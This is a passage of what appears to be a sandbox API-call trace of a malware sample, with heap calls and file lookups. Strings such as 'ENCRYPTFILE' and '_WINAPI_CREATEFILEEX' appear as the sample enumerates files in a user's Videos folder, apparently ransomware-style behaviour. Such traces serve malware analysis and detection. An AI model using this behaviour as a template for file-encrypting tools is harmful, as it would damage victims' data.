ftLastAccessTime.dwLowDateTime=0xdcb950a0, ftLastAccessTime.dwHighDateTime=0x1d5eb24, ftLastWriteTime.dwLowDateTime=0xdcb950a0, ftLastWriteTime.dwHighDateTime=0x1d5eb24, nFileSizeHigh=0x0, nFileSizeLow=0x9e42, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="9ua4aLpWeNEQZn vUIUd.mkv", cAlternateFileName="9UA4AL~1.MKV")) returned 0 [0098.213] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0098.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0098.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0098.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0098.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0098.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0098.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0098.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0098.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0098.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0098.213] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0098.213] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0098.213] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0098.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0098.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0098.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0098.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0098.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0098.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf400 | out: hHeap=0x1780000) returned 1 [0098.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0098.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0098.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0098.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4181178 | out: hHeap=0x1780000) returned 1 [0098.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0098.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0098.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0098.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0098.214] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0098.214] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0098.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0098.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0098.214] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0098.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0098.214] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0098.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0098.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0098.214] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0098.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0098.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0098.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0098.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0098.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0098.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0098.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0098.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a030 [0098.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0098.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0098.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0098.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0098.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0098.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a030 | out: hHeap=0x1780000) returned 1 [0098.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0098.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0098.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0098.215] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0098.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d28 [0098.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0098.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0098.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0098.215] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0098.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0098.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0098.216] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0098.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0098.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0098.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0098.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0098.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0098.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0098.216] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0098.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0098.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0098.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0098.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0098.216] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0098.216] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0098.216] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9zsS8CRW.avi", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79ba7cc0, ftCreationTime.dwHighDateTime=0x1d5f012, ftLastAccessTime.dwLowDateTime=0xea544c10, ftLastAccessTime.dwHighDateTime=0x1d5ed4f, ftLastWriteTime.dwLowDateTime=0xea544c10, ftLastWriteTime.dwHighDateTime=0x1d5ed4f, nFileSizeHigh=0x0, nFileSizeLow=0xa962, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="9zsS8CRW.avi", cAlternateFileName="")) returned 0x41ac000 [0098.217] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0098.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0098.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0098.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0098.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0098.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0098.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0098.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0098.217] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0098.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0098.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0098.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0098.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2490 [0098.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0098.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0098.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0098.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0098.217] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0098.217] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e48 [0098.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0098.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0098.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0098.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0098.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0098.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0098.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0098.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0098.218] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0098.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0098.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0098.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0098.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0098.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0098.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0098.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0098.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0098.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0098.218] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0098.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e38 | out: hHeap=0x1780000) returned 1 [0098.218] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0098.218] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23a0 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0098.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2420 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0098.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2430 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0098.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bf0 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0098.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0098.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0098.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0098.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0098.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0098.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0098.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0098.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0098.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0098.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0098.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0098.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0098.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0098.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0098.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0098.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0098.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0098.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0098.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0098.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0098.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0098.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0098.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0098.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0098.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0098.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0098.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0098.221] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0098.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0098.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0098.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0098.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0098.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0098.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0098.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0098.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0098.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0098.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0098.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0098.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0098.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0098.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0098.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0098.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0098.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0098.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0098.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0098.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0098.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0098.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0098.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0098.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0098.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0098.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0098.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0098.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0098.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0098.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0098.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0098.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0098.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0098.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0098.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0098.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0098.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0098.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0098.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0098.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0098.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0098.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0098.224] RtlAllocateHeap 